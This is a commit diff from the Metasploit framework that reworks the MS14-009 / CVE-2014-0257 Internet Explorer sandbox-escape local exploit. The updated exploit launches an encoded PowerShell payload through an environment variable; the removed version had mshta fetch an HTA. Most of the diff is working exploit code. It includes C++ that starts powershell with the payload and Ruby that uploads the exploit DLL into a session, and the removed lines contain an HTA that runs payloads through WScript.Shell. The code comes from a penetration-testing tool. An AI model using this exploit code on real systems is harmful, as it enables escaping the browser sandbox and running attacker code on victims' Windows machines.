Use powershell instead of mshta

2014-06-03 10:00:32 -05:00 · 2014-06-03 10:00:32 -05:00 · 8d111caeb9
parent 7f4702b65e 443f9f175c
commit 8d111caeb9
3 changed files with 22 additions and 45 deletions
--- a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll
+++ b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll
--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
@ -165,8 +165,8 @@ void DoDfsvcExploit()
 				{
 					std::vector<variant_t> startArgs;

-					startArgs.push_back(L"mshta");
-					startArgs.push_back(GetEnv(L"MYURL"));
+					startArgs.push_back(L"powershell");
+					startArgs.push_back(GetEnv(L"PSHCMD"));

 					ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
 				}
--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Local

  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
-  include Msf::Exploit::Remote::HttpServer
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::File
@ -47,12 +46,15 @@ class Metasploit3 < Msf::Exploit::Local
        ],
      'Platform'	    => [ 'win' ],
      'SessionTypes'	=> [ 'meterpreter' ],
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'	=>
        [
          [ 'IE 8 - 11', { } ]
        ],
      'DefaultTarget' => 0,
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30
+        },
      'DisclosureDate'=> "Feb 11 2014",
      'References' =>
        [
@ -62,11 +64,6 @@ class Metasploit3 < Msf::Exploit::Local
          ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
        ]
    ))
-
-    register_options(
-      [
-        OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
-      ])
  end

  def check
@ -153,12 +150,20 @@ class Metasploit3 < Msf::Exploit::Local

    print_good(".NET looks vulnerable, exploiting...")

-    begin
-      Timeout.timeout(datastore['DELAY']) { super }
-    rescue Timeout::Error
-    end
+    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)

-    session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil)
+    temp = get_env('TEMP')
+
+    print_status("Loading Exploit Library...")
+
+    session.core.load_library(
+        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
+        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
+        'UploadLibrary'   => true,
+        'Extension'       => false,
+        'SaveToDisk'      => false
+    )
  end

  def valid_mscorlib_version?(net_version, mscorlib_version)
@ -183,37 +188,9 @@ class Metasploit3 < Msf::Exploit::Local
    valid
  end

-  def primer
-    exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
-    session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri)
-
-    temp = get_env('TEMP')
-
-    print_status("Loading Exploit Library...")
-
-    session.core.load_library(
-        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
-        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
-        'UploadLibrary'   => true,
-        'Extension'       => false,
-        'SaveToDisk'      => false
-    )
-  end
-
-  def on_request_uri(cli, request)
-    if request.uri =~ /\.hta$/
-      print_status("Sending hta...")
-      hta = <<-eos
-<script>
-var command = "#{cmd_psh_payload(payload.encoded).strip}";
-var shell = new ActiveXObject("WScript.Shell");
-shell.Run(command);
-</script>
-      eos
-      send_response(cli, hta, {'Content-Type'=>'application/hta'})
-    else
-      send_not_found(cli)
-    end
+  def cleanup
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
+    super
  end

 end